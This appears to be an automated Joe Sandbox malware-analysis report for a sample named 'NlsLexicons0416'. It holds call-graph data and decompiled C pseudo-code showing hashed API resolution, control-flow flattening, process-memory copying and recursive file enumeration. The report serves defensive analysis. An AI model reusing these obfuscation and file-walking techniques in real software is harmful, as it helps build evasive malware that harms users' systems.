GetPEB 6882->6885 6886 3e78a3 6882->6886 6891 3e3e60 GetPEB 6882->6891 6883->6882 6887 3e3f00 GetPEB 6884->6887 6888 3e77d2 6884->6888 6885->6882 6886->6376 6889 3e77c6 6887->6889 6888->6376 6890 3e3e60 GetPEB 6889->6890 6890->6888 6891->6882 7121 3e9b60 7129 3e9b80 7121->7129 7122 3e9d96 7124 3e9d12 7122->7124 7125 3e3f00 GetPEB 7122->7125 7123 3e9dd0 GetPEB 7123->7129 7126 3e9da9 7125->7126 7127 3e3e60 GetPEB 7126->7127 7127->7124 7128 3e3f00 GetPEB 7128->7129 7129->7122 7129->7123 7129->7124 7129->7128 7130 3e3e60 GetPEB 7129->7130 7130->7129 7131 3e47e0 7132 3e4c80 GetPEB 7131->7132 7133 3e47f5 7132->7133 6981 3ea198 7001 3ea189 6981->7001 6982 3eacd0 GetPEB 6982->7001 6983 3ea552 6987 3e3f00 GetPEB 6983->6987 6990 3ea571 6983->6990 6984 3ea439 6985 3e1150 GetPEB 6985->7001 6986 3e34c0 GetPEB 6986->7001 6989 3ea565 6987->6989 6988 3e4220 GetPEB 6988->7001 6992 3e3e60 GetPEB 6989->6992 6994 3ea599 6990->6994 6996 3e3f00 GetPEB 6990->6996 6991 3e4b70 2 API calls 6991->7001 6992->6990 6993 3eb520 GetPEB 6993->7001 6995 3e3f00 GetPEB 6995->7001 6997 3ea58d 6996->6997 6999 3e3e60 GetPEB 6997->6999 6998 3e3460 GetPEB 6998->7001 6999->6994 7000 3e3e60 GetPEB 7000->7001 7001->6982 7001->6983 7001->6984 7001->6985 7001->6986 7001->6988 7001->6991 7001->6993 7001->6995 7001->6998 7001->7000 7140 3e1fd8 7146 3e1fd2 7140->7146 7141 3e2212 7142 3e2208 7141->7142 7144 3e4220 GetPEB 7141->7144 7143 3e42c0 GetPEB 7143->7146 7144->7142 7145 3e3f00 GetPEB 7145->7146 7146->7141 7146->7142 7146->7143 7146->7145 7147 3e3e60 GetPEB 7146->7147 7147->7146 7002 3eb110 7003 3eb124 7002->7003 7004 3e6060 GetPEB 7003->7004 7015 3eb1aa 7003->7015 7005 3eb136 7004->7005 7006 3e3310 GetPEB 7005->7006 7007 3eb14c 7006->7007 7008 3eb182 7007->7008 7009 3e3f00 GetPEB 7007->7009 7012 3e3f00 GetPEB 7008->7012 7008->7015 7010 3eb176 7009->7010 7011 3e3e60 GetPEB 7010->7011 7011->7008 7013 3eb19e 7012->7013 7014 3e3e60 GetPEB 7013->7014 7014->7015 7016 3e6208 7025 3e6202 7016->7025 7017 3e42c0 GetPEB 7017->7025 7018 3e624b 7019 3e55b0 GetPEB 7019->7025 7020 3e4c80 GetPEB 7020->7025 7021 3e6490 7022 3e3f00 GetPEB 7022->7025 7023 3e3e60 GetPEB 7023->7025 7024 3e3f00 GetPEB 7026 3e642d 7024->7026 7025->7017 7025->7018 7025->7019 7025->7020 7025->7022 7025->7023 7025->7026 7026->7021 7026->7024 7027 3e3e60 GetPEB 7026->7027 7027->7026 7028 3e6608 7070 3e65fd 7028->7070 7029 3e94d0 GetPEB 7029->7070 7030 3e6dcd 7039 3eb2e0 GetPEB 7030->7039 7031 3e7410 GetPEB 7031->7070 7032 3e8bb0 2 API calls 7032->7070 7033 3e706e 7038 3e8740 3 API calls 7033->7038 7034 3e9f30 GetPEB 7034->7070 7035 3e68df 7036 3e9050 GetPEB 7036->7070 7037 3eb1d0 GetPEB 7037->7070 7045 3e7073 7038->7045 7039->7035 7040 3e7061 7043 3e8d40 2 API calls 7040->7043 7041 3e72d0 GetPEB 7041->7070 7042 3e9860 6 API calls 7042->7070 7053 3e7066 7043->7053 7044 3e61e0 GetPEB 7044->7070 7046 3e80a0 3 API calls 7046->7070 7047 3e53d0 GetPEB 7047->7070 7048 3e6f27 GetTickCount 7048->7070 7049 3e9270 GetPEB 7049->7070 7050 3e7120 3 API calls 7050->7070 7051 3e8700 GetPEB 7051->7070 7052 3e3f00 GetPEB 7052->7070 7054 3e4770 2 API calls 7054->7070 7055 3e3310 GetPEB 7055->7070 7056 3e4220 GetPEB 7056->7070 7057 3e3e60 GetPEB 7057->7070 7058 3e12b0 2 API calls 7058->7070 7059 3eb430 3 API calls 7059->7070 7060 3e8970 2 API calls 7060->7070 7061 3e8e80 2 API calls 7061->7070 7062 3e6060 GetPEB 7062->7070 7063 3e8400 2 API calls 7063->7070 7064 3e6975 GetTickCount 7064->7070 7065 3e1840 GetPEB 7065->7070 7066 3e9620 2 API calls 7066->7070 7067 3eafe0 GetPEB 7067->7070 7068 3e3460 GetPEB 7068->7070 7069 3e4160 GetPEB 7069->7070 7070->7029 7070->7030 7070->7031 7070->7032 7070->7033 7070->7034 7070->7035 7070->7036 7070->7037 7070->7040 7070->7041 7070->7042 7070->7044 7070->7046 7070->7047 7070->7048 7070->7049 7070->7050 7070->7051 7070->7052 7070->7054 7070->7055 7070->7056 7070->7057 7070->7058 7070->7059 7070->7060 7070->7061 7070->7062 7070->7063 7070->7064 7070->7065 7070->7066 7070->7067 7070->7068 7070->7069 5969 3e3780 5970 3e3795 5969->5970 5971 3e37ab 5969->5971 5972 3e3f00 GetPEB 5970->5972 5974 3e37dd 5971->5974 5976 3e3f00 GetPEB 5971->5976 5973 3e379f 5972->5973 5975 3e3e60 GetPEB 5973->5975 5979 3e3812 5974->5979 5980 3e3f00 GetPEB 5974->5980 5975->5971 5977 3e37d1 5976->5977 5978 3e3e60 GetPEB 5977->5978 5978->5974 5982 3e384a 5979->5982 5984 3e3f00 GetPEB 5979->5984 5981 3e3806 5980->5981 5983 3e3e60 GetPEB 5981->5983 5987 3e3f00 GetPEB 5982->5987 5988 3e3876 5982->5988 5983->5979 5985 3e383e 5984->5985 5986 3e3e60 GetPEB 5985->5986 5986->5982 5989 3e386a 5987->5989 5990 3e38d1 SHFileOperationW 5988->5990 5992 3e3f00 GetPEB 5988->5992 5991 3e3e60 GetPEB 5989->5991 5991->5988 5993 3e38c0 5992->5993 5994 3e3e60 GetPEB 5993->5994 5995 3e38cc 5994->5995 5995->5990 7083 3e2b80 7084 3e2b99 7083->7084 7085 3e2baf 7083->7085 7086 3e3f00 GetPEB 7084->7086 7087 3e2ba3 7086->7087 7088 3e3e60 GetPEB 7087->7088 7088->7085 7148 3e7e40 7156 3e7e50 7148->7156 7149 3e7f83 7151 3e38f0 2 API calls 7149->7151 7150 3e7f7a 7152 3e7f96 7151->7152 7153 3e34c0 GetPEB 7153->7156 7154 3e3e60 GetPEB 7154->7156 7155 3e3f00 GetPEB 7155->7156 7156->7149 7156->7150 7156->7153 7156->7154 7156->7155

                                                                                Executed Functions

                                                                                Function 003D0400, Relevance: 21.1, APIs: 14, Instructions: 132memorynativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 003D0448
                                                                                  • Part of subcall function 003D1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,003D0EFD,00000000), ref: 003D1155
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 003D0463
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 003D0484
                                                                                • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 003D048D
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 003D0492
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 003D049F
                                                                                • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 003D04A6
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 003D04B9
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 003D04E0
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 003D04F7
                                                                                • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 003D0519
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 003D0530
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 003D0547
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 003D0562
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295897872.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3d0000_NlsLexicons0416.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 482429597-0
                                                                                • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction ID: 69eb5499ea1b495a3c6b4292337390fcf8898fdb44a230030d5fcc4ec2977da9
                                                                                • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction Fuzzy Hash: EE414DB29043417FE615EBB2D846F6FB3EDAB88B40F408D1EB6449B341DA74D9048B62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E38F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 375 3e38f0-3e390b 376 3e3910-3e3915 375->376 377 3e391b 376->377 378 3e3a69-3e3a6e 376->378 381 3e3a5f-3e3a64 377->381 382 3e3921-3e3926 377->382 379 3e3acc-3e3adf call 3e34c0 378->379 380 3e3a70-3e3a75 378->380 396 3e3afc-3e3b17 379->396 397 3e3ae1-3e3af7 call 3e3f00 call 3e3e60 379->397 383 3e3ab6-3e3abb 380->383 384 3e3a77-3e3a7e 380->384 381->376 385 3e392c-3e3931 382->385 386 3e3a17-3e3a1e 382->386 383->376 393 3e3ac1-3e3acb 383->393 389 3e3a9b-3e3ab1 384->389 390 3e3a80-3e3a96 call 3e3f00 call 3e3e60 384->390 394 3e3937-3e393c 385->394 395 3e3b70-3e3b77 385->395 391 3e3a3b-3e3a4f FindFirstFileW 386->391 392 3e3a20-3e3a36 call 3e3f00 call 3e3e60 386->392 389->376 390->389 402 3e3b97-3e3ba1 391->402 403 3e3a55-3e3a5a 391->403 392->391 394->383 404 3e3942-3e3947 394->404 400 3e3b79-3e3b8f call 3e3f00 call 3e3e60 395->400 401 3e3b94 395->401 425 3e3b19-3e3b2f call 3e3f00 call 3e3e60 396->425 426 3e3b34-3e3b3f 396->426 397->396 400->401 401->402 403->376 405 3e394d-3e3953 404->405 406 3e39f1-3e3a12 404->406 412 3e3974-3e3976 405->412 413 3e3955-3e395d 405->413 406->376 420 3e396d-3e3972 412->420 422 3e3978-3e398b call 3e34c0 412->422 419 3e395f-3e3963 413->419 413->420 419->412 429 3e3965-3e396b 419->429 420->376 439 3e398d-3e39a3 call 3e3f00 call 3e3e60 422->439 440 3e39a8-3e39ec call 3e38f0 call 3e3460 422->440 425->426 437 3e3b5c-3e3b6b 426->437 438 3e3b41-3e3b57 call 3e3f00 call 3e3e60 426->438 429->412 429->420 437->376 438->437 439->440 440->376
                                                                                C-Code - Quality: 63%
                                                                                			E003E38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				signed int _t34;
				void* _t39;
				intOrPtr* _t42;
				signed int _t46;
				intOrPtr* _t50;
				intOrPtr _t55;
				void* _t56;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t98;

				_t91 = __ecx;
				_t95 = __edx;
				_v1640 = __ecx;
				_t22 = 0x25a25425;
				_t56 = _v1640;
				while(1) {
					L1:
					_t98 = _t22 - 0x25a25425;
					if(_t98 > 0) {
						break;
					}
					if(_t98 == 0) {
						_t22 = 0x29bc40d3;
						continue;
					} else {
						if(_t22 == 0x8a099c9) {
							if( *0x3ee430 == 0) {
								 *0x3ee430 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0x83efb111, _t95);
							}
							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t56 = _t39;
							if(_t56 == 0xffffffff) {
								return _t39;
							} else {
								_t22 = 0x1a4f9837;
								continue;
							}
						} else {
							if(_t22 == 0xb46fa16) {
								_t42 =  *0x3edba4;
								if(_t42 == 0) {
									_t42 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0xd274268a, _t95);
									 *0x3edba4 = _t42;
								}
								return  *_t42(_t56);
							}
							if(_t22 != 0x1a4f9837) {
								L27:
								if(_t22 != 0x55fa1f4) {
									continue;
								} else {
									return _t22;
								}
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t46 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L12:
										if(_t95 == 0) {
											goto L11;
										} else {
											_t94 = E003E34C0(0x3ed290);
											_t50 =  *0x3ee158;
											if(_t50 == 0) {
												_t50 = E003E3E60(_t56, E003E3F00(0xc6fbcd74), 0xba71dd03, _t95);
												 *0x3ee158 = _t50;
											}
											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
											E003E38F0( &_v1044, _t95, _a4, _a8);
											_t96 = _t96 + 0x1c;
											E003E3460(_t94);
											_t22 = 0x36cb81de;
										}
									} else {
										_t55 = _v1590;
										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
											L11:
											_t22 = 0x36cb81de;
										} else {
											goto L12;
										}
									}
								}
								continue;
							}
						}
					}
					L40:
				}
				if(_t22 == 0x29bc40d3) {
					_t93 = E003E34C0(0x3ed260);
					_t24 =  *0x3ee158;
					if(_t24 == 0) {
						_t24 = E003E3E60(_t56, E003E3F00(0xc6fbcd74), 0xba71dd03, _t95);
						 *0x3ee158 = _t24;
					}
					 *_t24( &_v524, 0x104, _t93, _t91);
					_t26 =  *0x3ee494;
					_t96 = _t96 + 0x10;
					if(_t26 == 0) {
						_t26 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0x7facde30, _t95);
						 *0x3ee494 = _t26;
					}
					_t92 =  *_t26();
					_t28 =  *0x3edf30;
					if(_t28 == 0) {
						_t28 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0x5010a54d, _t95);
						 *0x3edf30 = _t28;
					}
					 *_t28(_t92, 0, _t93);
					_t91 = _v1652;
					_t22 = 0x8a099c9;
					goto L1;
				} else {
					if(_t22 != 0x36cb81de) {
						goto L27;
					} else {
						_t33 =  *0x3edf88;
						if(_t33 == 0) {
							_t33 = E003E3E60(_t56, E003E3F00(0x9bab0b12), 0xa53a5b1a, _t95);
							 *0x3edf88 = _t33;
						}
						_t34 =  *_t33(_t56,  &_v1636);
						asm("sbb eax, eax");
						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
						goto L1;
					}
				}
				goto L40;
			}































                                                                                0x003e38fa
                                                                                0x003e38fc
                                                                                0x003e38fe
                                                                                0x003e3902
                                                                                0x003e3907
                                                                                0x003e3910
                                                                                0x003e3910
                                                                                0x003e3910
                                                                                0x003e3915
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e391b
                                                                                0x003e3a5f
                                                                                0x00000000
                                                                                0x003e3921
                                                                                0x003e3926
                                                                                0x003e3a1e
                                                                                0x003e3a36
                                                                                0x003e3a36
                                                                                0x003e3a48
                                                                                0x003e3a4a
                                                                                0x003e3a4f
                                                                                0x003e3ba1
                                                                                0x003e3a55
                                                                                0x003e3a55
                                                                                0x00000000
                                                                                0x003e3a55
                                                                                0x003e392c
                                                                                0x003e3931
                                                                                0x003e3b70
                                                                                0x003e3b77
                                                                                0x003e3b8a
                                                                                0x003e3b8f
                                                                                0x003e3b8f
                                                                                0x00000000
                                                                                0x003e3b95
                                                                                0x003e393c
                                                                                0x003e3ab6
                                                                                0x003e3abb
                                                                                0x00000000
                                                                                0x003e3acb
                                                                                0x003e3acb
                                                                                0x003e3acb
                                                                                0x003e3942
                                                                                0x003e3947
                                                                                0x003e39fd
                                                                                0x003e3a06
                                                                                0x003e3a0d
                                                                                0x003e394d
                                                                                0x003e3953
                                                                                0x003e3974
                                                                                0x003e3976
                                                                                0x00000000
                                                                                0x003e3978
                                                                                0x003e3982
                                                                                0x003e3984
                                                                                0x003e398b
                                                                                0x003e399e
                                                                                0x003e39a3
                                                                                0x003e39a3
                                                                                0x003e39bc
                                                                                0x003e39d8
                                                                                0x003e39dd
                                                                                0x003e39e2
                                                                                0x003e39e7
                                                                                0x003e39e7
                                                                                0x003e3955
                                                                                0x003e3955
                                                                                0x003e395d
                                                                                0x003e396d
                                                                                0x003e396d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e395d
                                                                                0x003e3953
                                                                                0x00000000
                                                                                0x003e3947
                                                                                0x003e393c
                                                                                0x003e3926
                                                                                0x00000000
                                                                                0x003e391b
                                                                                0x003e3a6e
                                                                                0x003e3ad6
                                                                                0x003e3ad8
                                                                                0x003e3adf
                                                                                0x003e3af2
                                                                                0x003e3af7
                                                                                0x003e3af7
                                                                                0x003e3b0b
                                                                                0x003e3b0d
                                                                                0x003e3b12
                                                                                0x003e3b17
                                                                                0x003e3b2a
                                                                                0x003e3b2f
                                                                                0x003e3b2f
                                                                                0x003e3b36
                                                                                0x003e3b38
                                                                                0x003e3b3f
                                                                                0x003e3b52
                                                                                0x003e3b57
                                                                                0x003e3b57
                                                                                0x003e3b60
                                                                                0x003e3b62
                                                                                0x003e3b66
                                                                                0x00000000
                                                                                0x003e3a70
                                                                                0x003e3a75
                                                                                0x00000000
                                                                                0x003e3a77
                                                                                0x003e3a77
                                                                                0x003e3a7e
                                                                                0x003e3a91
                                                                                0x003e3a96
                                                                                0x003e3a96
                                                                                0x003e3aa1
                                                                                0x003e3aa5
                                                                                0x003e3aac
                                                                                0x00000000
                                                                                0x003e3aac
                                                                                0x003e3a75
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 003E3A48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: .
                                                                                • API String ID: 1974802433-248832578
                                                                                • Opcode ID: 59dda3ab98b407d8618fcc53b3a7d06847a9f36683dd29bcd4ad2946dd87d394
                                                                                • Instruction ID: ebad58ed1d4e53fb205c4c3d4125e58790bbc3cb2dbff0001b831096572d3aaf
                                                                                • Opcode Fuzzy Hash: 59dda3ab98b407d8618fcc53b3a7d06847a9f36683dd29bcd4ad2946dd87d394
                                                                                • Instruction Fuzzy Hash: D05103316042E54BCA36AB6A988D77B36AA9BD0700F010B29F456CF3D2EB75CF454792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E5040, Relevance: 1.7, APIs: 1, Instructions: 248memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E003E5040(intOrPtr __ecx, intOrPtr __edx) {
				char _v4;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				void* _v36;
				intOrPtr _v44;
				signed int _v52;
				void* _v68;
				void* __ebx;
				void* __ebp;
				void* _t16;
				void* _t17;
				void* _t23;
				void* _t26;
				void* _t29;
				void* _t31;
				void* _t35;
				void* _t37;
				void* _t41;
				void* _t42;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t58;
				intOrPtr* _t101;
				void* _t103;
				signed int _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t115;
				void* _t116;

				_t101 = _v12;
				_t58 = 0;
				_v16 = __edx;
				_t112 = 0;
				_v20 = __ecx;
				_t104 = 0x1ca940c1;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t115 = _t104 - 0x12f72f95;
						if(_t115 <= 0) {
							break;
						}
						__eflags = _t104 - 0x26342ffd;
						if(__eflags > 0) {
							__eflags = _t104 - 0x2fab56c4;
							if(_t104 != 0x2fab56c4) {
								goto L40;
							} else {
								_t17 =  *0x3ee494;
								__eflags = _t17;
								if(_t17 == 0) {
									_t17 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x7facde30, _t112);
									 *0x3ee494 = _t17;
								}
								_t105 =  *_t17();
								__eflags =  *0x3edd18;
								if( *0x3edd18 == 0) {
									 *0x3edd18 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x9ff0609c, _t112);
								}
								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
								_t58 = _t16;
								__eflags = _t58;
								if(_t58 != 0) {
									_t104 = 0x8956eec;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t23 =  *0x3ee484;
								__eflags = _t23;
								if(_t23 == 0) {
									_t23 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x9e91db81, _t112);
									 *0x3ee484 = _t23;
								}
								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
								asm("sbb esi, esi");
								_t26 =  *0x3ee18c;
								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
								__eflags = _t26;
								if(_t26 == 0) {
									_t26 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x268fe5f0, _t112);
									 *0x3ee18c = _t26;
								}
								_t16 =  *_t26(_v44);
								goto L40;
							} else {
								__eflags = _t104 - 0x1ca940c1;
								if(_t104 == 0x1ca940c1) {
									_t104 = 0x2fab56c4;
									continue;
								} else {
									__eflags = _t104 - 0x254bd927;
									if(_t104 != 0x254bd927) {
										L40:
										__eflags = _t104 - 0x1f0f293e;
										if(_t104 != 0x1f0f293e) {
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										}
									} else {
										_t50 =  *0x3ee29c;
										__eflags = _t50;
										if(_t50 == 0) {
											_t50 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x4574c66, _t112);
											 *0x3ee29c = _t50;
										}
										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
										__eflags = _t51;
										if(_t51 == 0) {
											L13:
											_t104 = 0x11e09e52;
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										} else {
											_t52 =  *0x3ede08;
											__eflags = _t52;
											if(_t52 == 0) {
												_t52 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0xd8ef4c49, _t112);
												 *0x3ede08 = _t52;
											}
											_t53 =  *_t52();
											_t104 = 0x128dff18;
											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
											_t16 = _t58 + _v52 * 0x2c;
											__eflags = _t103 - _t16;
											_v68 = _t16;
											_t101 =  >=  ? _t58 : _t103;
											continue;
										}
										L55:
									}
								}
							}
						}
						L54:
						return _t16;
						goto L55;
					}
					if(_t115 == 0) {
						_t29 =  *0x3ee494;
						__eflags = _t29;
						if(_t29 == 0) {
							_t29 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x7facde30, _t112);
							 *0x3ee494 = _t29;
						}
						_t107 =  *_t29();
						_t31 =  *0x3edf30;
						__eflags = _t31;
						if(_t31 == 0) {
							_t31 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x5010a54d, _t112);
							 *0x3edf30 = _t31;
						}
						return  *_t31(_t107, 0, _t58);
					}
					_t116 = _t104 - 0x10f7fbef;
					if(_t116 > 0) {
						__eflags = _t104 - 0x11e09e52;
						if(_t104 == 0x11e09e52) {
							_t35 =  *0x3ee494;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x7facde30, _t112);
								 *0x3ee494 = _t35;
							}
							_t108 =  *_t35();
							_t37 =  *0x3edf30;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E003E3E60(_t58, E003E3F00(0x9bab0b12), 0x5010a54d, _t112);
								 *0x3edf30 = _t37;
							}
							 *_t37(_t108, 0, _t112);
							_t104 = 0x12f72f95;
							continue;
						} else {
							__eflags = _t104 - 0x128dff18;
							if(_t104 != 0x128dff18) {
								goto L40;
							} else {
								_t41 =  *0x3ee270;
								__eflags = _t41;
								if(_t41 == 0) {
									_t41 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x56e230f9, _t112);
									 *0x3ee270 = _t41;
								}
								_t42 =  *_t41(_v20,  *_t101, 1);
								__eflags = _t42;
								_v36 = _t42;
								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
								while(1) {
									_t16 = _v28;
									goto L2;
								}
							}
						}
					} else {
						if(_t116 == 0) {
							_t45 =  *0x3ee200;
							__eflags = _t45;
							if(_t45 == 0) {
								_t45 = E003E3E60(_t58, E003E3F00(0x26f5757c), 0x16d40839, _t112);
								 *0x3ee200 = _t45;
							}
							 *_t45(_v16, 1, _t112);
							goto L13;
						} else {
							if(_t104 == 0x5d498c4) {
								_t101 = _t101 + 0x2c;
								__eflags = _t101 - _t16;
								asm("sbb esi, esi");
								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
								goto L2;
							} else {
								if(_t104 != 0x8956eec) {
									goto L40;
								} else {
									_t112 = E003E42C0(_t58, 0x2000);
									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						}
					}
					goto L54;
				}
			}









































                                                                                0x003e5047
                                                                                0x003e504b
                                                                                0x003e504d
                                                                                0x003e5051
                                                                                0x003e5053
                                                                                0x003e5057
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x003e5060
                                                                                0x003e5060
                                                                                0x003e5060
                                                                                0x003e5066
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e51af
                                                                                0x003e51b5
                                                                                0x003e52f9
                                                                                0x003e52ff
                                                                                0x00000000
                                                                                0x003e5301
                                                                                0x003e5301
                                                                                0x003e5306
                                                                                0x003e5308
                                                                                0x003e531b
                                                                                0x003e5320
                                                                                0x003e5320
                                                                                0x003e5327
                                                                                0x003e532e
                                                                                0x003e5330
                                                                                0x003e5348
                                                                                0x003e5348
                                                                                0x003e5355
                                                                                0x003e5357
                                                                                0x003e5359
                                                                                0x003e535b
                                                                                0x003e535d
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x00000000
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x003e535b
                                                                                0x003e51bb
                                                                                0x003e51bb
                                                                                0x003e5277
                                                                                0x003e527c
                                                                                0x003e527e
                                                                                0x003e5291
                                                                                0x003e5296
                                                                                0x003e5296
                                                                                0x003e52ac
                                                                                0x003e52b0
                                                                                0x003e52b2
                                                                                0x003e52bd
                                                                                0x003e52c3
                                                                                0x003e52c5
                                                                                0x003e52d8
                                                                                0x003e52dd
                                                                                0x003e52dd
                                                                                0x003e52e6
                                                                                0x00000000
                                                                                0x003e51c1
                                                                                0x003e51c1
                                                                                0x003e51c7
                                                                                0x003e526d
                                                                                0x00000000
                                                                                0x003e51cd
                                                                                0x003e51cd
                                                                                0x003e51d3
                                                                                0x003e52e8
                                                                                0x003e52e8
                                                                                0x003e52ee
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x00000000
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x003e51d9
                                                                                0x003e51d9
                                                                                0x003e51de
                                                                                0x003e51e0
                                                                                0x003e51f3
                                                                                0x003e51f8
                                                                                0x003e51f8
                                                                                0x003e521b
                                                                                0x003e521d
                                                                                0x003e521f
                                                                                0x003e50ef
                                                                                0x003e50ef
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x00000000
                                                                                0x003e505c
                                                                                0x003e5225
                                                                                0x003e5225
                                                                                0x003e522a
                                                                                0x003e522c
                                                                                0x003e523f
                                                                                0x003e5244
                                                                                0x003e5244
                                                                                0x003e5249
                                                                                0x003e524e
                                                                                0x003e525b
                                                                                0x003e525d
                                                                                0x003e525f
                                                                                0x003e5261
                                                                                0x003e5265
                                                                                0x00000000
                                                                                0x003e5265
                                                                                0x00000000
                                                                                0x003e521f
                                                                                0x003e51d3
                                                                                0x003e51c7
                                                                                0x003e51bb
                                                                                0x003e53c0
                                                                                0x003e53c0
                                                                                0x00000000
                                                                                0x003e53c0
                                                                                0x003e506c
                                                                                0x003e5367
                                                                                0x003e536c
                                                                                0x003e536e
                                                                                0x003e5381
                                                                                0x003e5386
                                                                                0x003e5386
                                                                                0x003e538d
                                                                                0x003e538f
                                                                                0x003e5394
                                                                                0x003e5396
                                                                                0x003e53a9
                                                                                0x003e53ae
                                                                                0x003e53ae
                                                                                0x00000000
                                                                                0x003e53b7
                                                                                0x003e5072
                                                                                0x003e5078
                                                                                0x003e50f9
                                                                                0x003e50ff
